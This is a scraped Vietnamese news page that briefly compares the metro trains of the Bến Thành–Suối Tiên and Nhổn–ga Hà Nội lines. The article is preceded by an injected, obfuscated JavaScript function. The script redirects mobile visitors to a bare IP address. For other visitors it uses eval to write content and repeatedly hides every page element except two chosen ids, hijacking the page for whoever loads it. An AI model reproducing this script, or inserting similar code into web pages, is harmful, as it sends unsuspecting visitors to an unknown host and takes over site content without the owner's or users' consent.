function goPAGE() { if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://180.215.56.197/" } else { var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if (myid != "iconDiv1" && myid != "yangchen") { document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {} } } goPAGE();

So sánh tàu Bến Thành - Suối Tiên và Nhổn - ga Hà Nội

Metro Bến Thành - Suối Tiên
Các toa tàu của dự án đường sắt đô thị Bến Thành - Suối Tiên và Nhổn - ga Hà Nội cùng về Việt Nam vào tháng 10, có thiết kế khác nhau về màu sắc, số lượng...

Thanh Huyền - Lộc Chung

Thời sự Thứ hai, 12/10/2020, 06:00 (GMT+7)